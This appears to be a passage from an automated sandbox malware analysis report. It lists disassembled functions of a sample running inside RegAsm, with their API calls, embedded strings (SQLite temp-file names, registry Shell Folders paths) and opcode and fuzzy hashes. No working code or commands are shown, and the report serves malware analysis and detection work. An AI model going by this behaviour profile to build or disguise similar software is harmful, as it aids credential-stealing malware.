                                                                • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                                • String ID: 0$6
                                                                • API String ID: 2029023288-3849865405
                                                                • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                • memset.MSVCRT ref: 00405455
                                                                • memset.MSVCRT ref: 0040546C
                                                                • memset.MSVCRT ref: 00405483
                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$memcpy$ErrorLast
                                                                • String ID: 6$\
                                                                • API String ID: 404372293-1284684873
                                                                • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                Function 0041851E Relevance: 10.6, APIs: 7, Instructions: 67sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AttributesErrorFileLastSleep$free
                                                                • String ID:
                                                                • API String ID: 1470729244-0
                                                                • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                • wcscpy.MSVCRT ref: 0040A0D9
                                                                • wcscat.MSVCRT ref: 0040A0E6
                                                                • wcscat.MSVCRT ref: 0040A0F5
                                                                • wcscpy.MSVCRT ref: 0040A107
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                • String ID:
                                                                • API String ID: 1331804452-0
                                                                • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                • String ID: advapi32.dll
                                                                • API String ID: 2012295524-4050573280
                                                                • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                • <%s>, xrefs: 004100A6
                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$_snwprintf
                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                • API String ID: 3473751417-2880344631
                                                                • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: wcscat$_snwprintfmemset
                                                                • String ID: %2.2X
                                                                • API String ID: 2521778956-791839006
                                                                • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _snwprintfwcscpy
                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                • API String ID: 999028693-502967061
                                                                • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 004116FF
                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                • API String ID: 2618321458-3614832568
                                                                • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AttributesFilefreememset
                                                                • String ID:
                                                                • API String ID: 2507021081-0
                                                                • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                • malloc.MSVCRT ref: 00417524
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                • free.MSVCRT ref: 00417544
                                                                • free.MSVCRT ref: 00417562
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                • String ID:
                                                                • API String ID: 4131324427-0
                                                                • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                • free.MSVCRT ref: 0041822B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: PathTemp$free
                                                                • String ID: %s\etilqs_$etilqs_
                                                                • API String ID: 924794160-1420421710
                                                                • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastMessage_snwprintf
                                                                • String ID: Error$Error %d: %s
                                                                • API String ID: 313946961-1552265934
                                                                • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: foreign key constraint failed$new$oid$old
                                                                • API String ID: 0-1953309616
                                                                • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy
                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                • API String ID: 3510742995-272990098
                                                                • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                Function 0040C3C3 Relevance: 7.6, APIs: 5, Instructions: 109registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                  • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                  • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                • memset.MSVCRT ref: 0040C439
                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                • _wcsupr.MSVCRT ref: 0040C481
                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                • memset.MSVCRT ref: 0040C4D0
                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: free$EnumValuememset$Open_wcsuprmemcpywcslen
                                                                • String ID:
                                                                • API String ID: 1423504147-0
                                                                • Opcode ID: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                • Opcode Fuzzy Hash: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                                                • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 0044A6EB
                                                                • memset.MSVCRT ref: 0044A6FB
                                                                • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpymemset
                                                                • String ID: gj
                                                                • API String ID: 1297977491-4203073231
                                                                • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                • free.MSVCRT ref: 0040E9D3
                                                                  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??3@$free
                                                                • String ID:
                                                                • API String ID: 2241099983-0
                                                                • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                • malloc.MSVCRT ref: 004174BD
                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                • free.MSVCRT ref: 004174E4
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                • String ID:
                                                                • API String ID: 4053608372-0
                                                                • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetParent.USER32(?), ref: 0040D453
                                                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Window$Rect$ClientParentPoints
                                                                • String ID:
                                                                • API String ID: 4247780290-0
                                                                • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                • memset.MSVCRT ref: 004450CD
                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
